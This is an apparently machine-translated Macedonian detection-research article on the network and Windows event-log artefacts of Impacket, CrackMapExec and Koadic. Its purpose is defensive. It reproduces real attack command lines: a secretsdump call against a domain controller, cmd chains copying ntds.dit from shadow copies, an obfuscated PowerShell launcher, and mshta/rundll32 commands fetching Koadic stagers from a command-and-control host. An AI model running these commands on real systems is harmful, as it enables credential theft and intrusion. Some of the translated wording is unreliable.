Како да откриете напади на инфраструктурата на Windows: проучување на хакерски алатки

Бројот на напади во корпоративниот сектор расте секоја година: на пример во 2017 година се забележани 13% повеќе уникатни инциденти отколку во 2016 година, а на крајот на 2018 година - 27% повеќе инцидентиотколку во претходниот период. Вклучувајќи ги и оние каде што главната работна алатка е оперативниот систем Windows. Во 2017-2018 година, APT Dragonfly, APT28, APT MuddyWater изврши напади врз владини и воени организации во Европа, Северна Америка и Саудиска Арабија. И ние користевме три алатки за ова - Удар, CrackMapExec и Коадиќ. Нивниот изворен код е отворен и достапен на GitHub.

Вреди да се напомене дека овие алатки не се користат за почетна пенетрација, туку за развој на напад во инфраструктурата. Напаѓачите ги користат во различни фази од нападот по пенетрацијата на периметарот. Ова, инаку, е тешко да се открие и често само со помош на технологијата идентификување на траги на компромис во мрежниот сообраќај или алатки кои овозможуваат откривање на активни дејствија на напаѓачот откако тој ќе навлезе во инфраструктурата. Алатките обезбедуваат различни функции, од пренос на датотеки до интеракција со регистарот и извршување на команди на оддалечена машина. Спроведовме студија за овие алатки за да ја одредиме нивната мрежна активност.

Што требаше да направиме:

• Разберете како функционираат алатките за хакирање. Дознајте што треба да искористат напаѓачите и кои технологии можат да ги користат.
• Најдете го она што не е откриено од алатките за безбедност на информации во првите фази од нападот. Фазата на извидување може да се прескокне, или затоа што напаѓачот е внатрешен напаѓач, или затоа што напаѓачот експлоатира дупка во инфраструктурата која претходно не била позната. Станува возможно да се врати целиот синџир на неговите постапки, па оттука и желбата да се открие понатамошно движење.
• Елиминирајте ги лажните позитиви од алатките за откривање на упад. Не смееме да заборавиме дека кога одредени дејства се откриваат само врз основа на извидување, можни се чести грешки. Вообичаено во инфраструктурата има доволен број начини, кои не се разликуваат од легитимните на прв поглед, за да се добие каква било информација.

Што им даваат овие алатки на напаѓачите? Ако ова е Impacket, тогаш напаѓачите добиваат голема библиотека на модули кои можат да се користат во различни фази од нападот што следат по пробивање на периметарот. Многу алатки користат Impacket модули внатрешно - на пример, Metasploit. Има dcomexec и wmiexec за далечинско извршување команди, secretsdump за добивање сметки од меморијата што се додадени од Impacket. Како резултат на тоа, правилното откривање на активноста на таквата библиотека ќе обезбеди откривање на деривати.

Не е случајно што креаторите напишаа „Powered by Impacket“ за CrackMapExec (или едноставно CME). Покрај тоа, CME има готова функционалност за популарни сценарија: Mimikatz за добивање лозинки или нивни хашови, имплементација на Meterpreter или Empire агент за далечинско извршување и Bloodhound на одборот.

Третата алатка што ја избравме беше Koadic. Тој е сосема неодамнешен, беше претставен на меѓународната хакерска конференција DEFCON 25 во 2017 година и се одликува со нестандарден пристап: работи преку HTTP, Java Script и Microsoft Visual Basic Script (VBS). Овој пристап се нарекува живеење надвор од земјата: алатката користи збир на зависности и библиотеки вградени во Windows. Креаторите го нарекуваат COM Command & Control, или C3.

IMPACKET

Функционалноста на Impacket е многу широка, почнувајќи од извидување во AD и собирање податоци од внатрешни MS SQL сервери, до техники за добивање акредитиви: ова е SMB реле напад и добивање на датотеката ntds.dit која содржи хаш на кориснички лозинки од контролер на домен. Impacket, исто така, извршува команди од далечина користејќи четири различни методи: WMI, Услуга за управување со распоредувач на Windows, DCOM и SMB и бара ингеренции за тоа.

Secretsdump

Ајде да погледнеме во secretsdump. Ова е модул кој може да ги таргетира и корисничките машини и контролорите на домени. Може да се користи за добивање копии од мемориските области LSA, SAM, SECURITY, NTDS.dit, така што може да се види во различни фази од нападот. Првиот чекор во работата на модулот е автентикација преку SMB, што бара или лозинката на корисникот или нејзиниот хаш за автоматски да го изврши нападот Pass the Hash. Следно доаѓа барање да се отвори пристап до Service Control Manager (SCM) и да се добие пристап до регистарот преку протоколот winreg, со кој напаѓачот може да ги дознае податоците од гранките од интерес и да добие резултати преку SMB.

На сл. 1 гледаме како точно кога се користи протоколот winreg, пристапот се добива со помош на клуч за регистар со LSA. За да го направите ова, користете ја командата DCERPC со оптички код 15 - OpenKey.

Ориз. 1. Отворање регистарски клуч со помош на протоколот winreg

Следно, кога ќе се добие пристап до клучот, вредностите се зачувуваат со командата SaveKey со оптички код 20. Impacket го прави тоа на многу специфичен начин. Ги зачувува вредностите во датотека чие име е низа од 8 случајни знаци додадени со .tmp. Дополнително, понатамошното поставување на оваа датотека се случува преку SMB од директориумот System32 (сл. 2).

Ориз. 2. Шема за добивање регистарски клуч од оддалечена машина

Излегува дека таквата активност на мрежата може да се открие со прашања до одредени гранки на регистарот користејќи го протоколот winreg, специфични имиња, команди и нивниот редослед.

Овој модул, исто така, остава траги во дневникот за настани на Windows, што го олеснува откривањето. На пример, како резултат на извршување на командата

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Во дневникот на Windows Server 2016 ќе ја видиме следната клучна низа на настани:

1. 4624 - далечинско најавување.
2. 5145 - проверка на правата за пристап до далечинската услуга winreg.
3. 5145 - проверка на правата за пристап до датотеки во директориумот System32. Датотеката го има случајното име споменато погоре.
4. 4688 - создавање процес cmd.exe што го стартува vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - создавање процес со командата:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - создавање процес со командата:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - создавање процес со командата:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Смбексец

Како и многу алатки по експлоатација, Impacket има модули за далечинско извршување на команди. Ќе се фокусираме на smbexec, кој обезбедува интерактивна командна обвивка на оддалечена машина. Овој модул исто така бара автентикација преку SMB, или со лозинка или хаш на лозинка. На сл. На слика 3 гледаме пример како функционира таквата алатка, во овој случај тоа е локалната администраторска конзола.

Ориз. 3. Интерактивна smbexec конзола

Првиот чекор на smbexec по автентикацијата е да се отвори SCM со командата OpenSCManagerW (15). Прашањето е забележливо: полето MachineName е DUMMY.

Ориз. 4. Барање за отворање на Управникот за контрола на услуги

Следно, услугата се креира со помош на командата CreateServiceW (12). Во случајот на smbexec, можеме да ја видиме истата логика на конструкција на командата секој пат. На сл. 5 зелената означува непроменливи командни параметри, жолтата означува што може да промени напаѓачот. Лесно е да се види дека името на извршната датотека, неговиот директориум и излезната датотека може да се сменат, но останатото е многу потешко да се промени без да се наруши логиката на модулот Impacket.

Ориз. 5. Побарајте да креирате услуга користејќи Управник за контрола на услуги

Smbexec исто така остава очигледни траги во дневникот за настани на Windows. Во дневникот на Windows Server 2016 за интерактивната командна школка со командата ipconfig, ќе ја видиме следната клучна низа на настани:

1. 4697 — инсталација на услугата на машината на жртвата:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - креирање на процесот cmd.exe со аргументите од точка 1.
3. 5145 - проверка на правата за пристап до датотеката __output во директориумот C$.
4. 4697 — инсталација на услугата на машината на жртвата.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - креирање на процесот cmd.exe со аргументите од точка 4.
6. 5145 - проверка на правата за пристап до датотеката __output во директориумот C$.

Импакет е основа за развој на алатки за напад. Ги поддржува скоро сите протоколи во Windows инфраструктурата и во исто време има свои карактеристични карактеристики. Еве специфични барања winreg и употребата на SCM API со карактеристично формирање команди, и форматот на името на датотеката и SMB share SYSTEM32.

CRACKMAPEXEC

Алатката CME е дизајнирана првенствено да ги автоматизира оние рутински дејства што напаѓачот треба да ги изврши за да напредува во мрежата. Ви овозможува да работите заедно со добро познатиот агент на Empire и Meterpreter. За тајно извршување на командите, CME може да ги замагли. Користејќи Bloodhound (посебна алатка за извидување), напаѓачот може да го автоматизира пребарувањето за активна сесија на администратор на домен.

bloodhound

Bloodhound, како самостојна алатка, овозможува напредно извидување во рамките на мрежата. Собира податоци за корисници, машини, групи, сесии и се доставува како скрипта PowerShell или бинарна датотека. LDAP или SMB-базирани протоколи се користат за собирање информации. Модулот за интеграција CME дозволува Bloodhound да се преземе во машината на жртвата, да работи и да ги прима собраните податоци по извршувањето, а со тоа да ги автоматизира дејствата во системот и да ги направи помалку забележливи. Графичката обвивка Bloodhound ги прикажува собраните податоци во форма на графикони, што ви овозможува да ја пронајдете најкратката патека од машината на напаѓачот до администраторот на доменот.

Ориз. 6. Интерфејс Bloodhound

За да работи на машината на жртвата, модулот создава задача користејќи ATSVC и SMB. ATSVC е интерфејс за работа со Windows Task Scheduler. CME ја користи својата функција NetrJobAdd(1) за креирање задачи преку мрежата. Пример за тоа што испраќа модулот CME е прикажан на сл. 7: Ова е команден повик cmd.exe и заматен код во форма на аргументи во XML формат.

Сл.7. Креирање задача преку CME

Откако задачата е поднесена за извршување, машината на жртвата го стартува самиот Bloodhound, а тоа може да се види во сообраќајот. Модулот се карактеризира со LDAP барања за да се добијат стандардни групи, список на сите машини и корисници во доменот и да се добијат информации за активните кориснички сесии преку барањето SRVSVC NetSessEnum.

Ориз. 8. Добивање листа на активни сесии преку SMB

Дополнително, стартувањето на Bloodhound на машината на жртвата со овозможена ревизија е придружено со настан со ID 4688 (создавање процес) и име на процесот «C:WindowsSystem32cmd.exe». Она што е забележливо за тоа се аргументите на командната линија:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Модулот enum_avproducts е многу интересен од гледна точка на функционалност и имплементација. WMI ви овозможува да го користите јазикот за пребарување на WQL за враќање на податоци од различни објекти на Windows, што во суштина го користи овој CME модул. Тој генерира прашања до класите AntiSpywareProduct и AntiМirusProduct за алатките за заштита инсталирани на машината на жртвата. Со цел да се добијат потребните податоци, модулот се поврзува со именскиот простор rootSecurityCenter2, потоа генерира WQL барање и добива одговор. На сл. Слика 9 ја прикажува содржината на таквите барања и одговори. Во нашиот пример, беше пронајден Windows Defender.

Ориз. 9. Мрежна активност на модулот enum_avproducts

Честопати, ревизијата на WMI (Trace WMI-Activity), во чии настани можете да најдете корисни информации за WQL прашања, може да биде оневозможена. Но, ако е овозможено, тогаш ако е извршена скриптата enum_avproducts, ќе се зачува настан со ID 11. Ќе го содржи името на корисникот кој го испратил барањето и името во именскиот простор rootSecurityCenter2.

Секој од CME модулите имаше свои артефакти, било да е тоа специфични WQL прашања или создавање на одреден тип на задачи во распоредувач на задачи со заматување и активност специфична за Bloodhound во LDAP и SMB.

КОАДИК

Посебна карактеристика на Koadic е употребата на JavaScript и VBScript толкувачи вградени во Windows. Во оваа смисла, тој го следи трендот на живеење надвор од земјата - односно нема надворешни зависности и користи стандардни алатки за Windows. Ова е алатка за целосна команда и контрола (CnC), бидејќи по инфекцијата на машината е инсталиран „имплант“ што овозможува да се контролира. Таквата машина, во коадската терминологија, се нарекува „зомби“. Доколку нема доволно привилегии за целосна операција од страната на жртвата, Koadic има можност да ги подигне користејќи техники за бајпас за контрола на корисничка сметка (UAC bypass).

Ориз. 10. Коадична школка

Жртвата мора да започне комуникација со серверот Command & Control. За да го направите ова, таа треба да контактира со претходно подготвен URI и да го прими главното тело на Koadic користејќи еден од сценаристите. На сл. Слика 11 покажува пример за мшта стејџерот.

Ориз. 11. Иницијализирање на сесија со CnC серверот

Врз основа на променливата за одговор WS, станува јасно дека извршувањето се случува преку WScript.Shell, а променливите STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE содржат клучни информации за параметрите на тековната сесија. Ова е првиот пар барање-одговор во HTTP врска со CnC сервер. Последователните барања се директно поврзани со функционалноста на повиканите модули (имплантите). Сите Koadic модули работат само со активна сесија со CnC.

Mimikatz

Исто како што CME работи со Bloodhound, Koadic работи со Mimikatz како посебна програма и има повеќе начини да ја стартува. Подолу е парот барање-одговор за преземање на имплантот Mimikatz.

Ориз. 12. Трансфер на Мимикатц во Коадиќ

Можете да видите како се промени форматот URI во барањето. Сега содржи вредност за променливата csrf, која е одговорна за избраниот модул. Не обрнувајте внимание на нејзиното име; Сите знаеме дека CSRF обично се разбира поинаку. Одговорот беше истото главно тело на Коадиќ, на кое беше додаден код поврзан со Мимикац. Тој е доста голем, па да ги погледнеме клучните точки. Овде ја имаме библиотеката Mimikatz кодирана во base64, сериска .NET класа која ќе ја инјектира и аргументи за лансирање на Mimikatz. Резултатот од извршувањето се пренесува преку мрежата во јасен текст.

Ориз. 13. Резултат од извршување на Mimikatz на далечинска машина

Exec_cmd

Koadic има и модули кои можат да извршуваат команди од далечина. Овде ќе го видиме истиот метод за генерирање URI и познатите sid и csrf променливи. Во случајот на модулот exec_cmd, кодот се додава на телото што е способно да извршува команди на школка. Подолу е прикажан таков код содржан во HTTP одговорот на CnC серверот.

Ориз. 14. Код на имплант exec_cmd

Променливата GAWTUUGCFI со познатиот атрибут WS е потребна за извршување на кодот. Со негова помош, имплантот ја повикува школката, обработувајќи две гранки на код - shell.exec со враќање на излезниот поток на податоци и shell.run без враќање.

Koadic не е типична алатка, но има свои артефакти со кои може да се најде во легитимен сообраќај:

• специјално формирање на HTTP барања,
• користејќи winHttpRequests API,
• создавање на објект WScript.Shell преку ActiveXObject,
• големо извршно тело.

Почетната врска е иницирана од стејџерот, така што е можно да се открие неговата активност преку настани на Windows. За mshta, ова е настан 4688, што укажува на создавање процес со атрибут за почеток:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Додека работи Koadic, можете да видите други 4688 настани со атрибути кои совршено го карактеризираат:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Наоди

Трендот за живеење од земјиштето се здобива со популарност меѓу криминалците. Тие ги користат алатките и механизмите вградени во Windows за нивните потреби. Гледаме популарни алатки Koadic, CrackMapExec и Impacket кои го следат овој принцип сè почесто се појавуваат во извештаите на APT. Расте и бројот на вилушки на GitHub за овие алатки, а се појавуваат и нови (сега веќе ги има околу илјада). Трендот добива на популарност поради неговата едноставност: на напаѓачите не им се потребни алатки од трети страни; тие веќе се на машините на жртвите и им помагаат да ги заобиколат безбедносните мерки. Се фокусираме на проучување на мрежната комуникација: секоја алатка опишана погоре остава свои траги во мрежниот сообраќај; деталното проучување на нив ни овозможи да го научиме нашиот производ Откривање на мрежен напад на PT детектирајте ги, што на крајот помага да се истражи целиот синџир на сајбер инциденти кои ги вклучуваат.

Автори:

• Антон Тјурин, раководител на Одделот за експертски услуги, Експертски безбедносен центар на ПТ, Позитивни технологии
• Егор Подмоков, експерт, ПТ Експертски безбедносен центар, Позитивни технологии

Извор: www.habr.com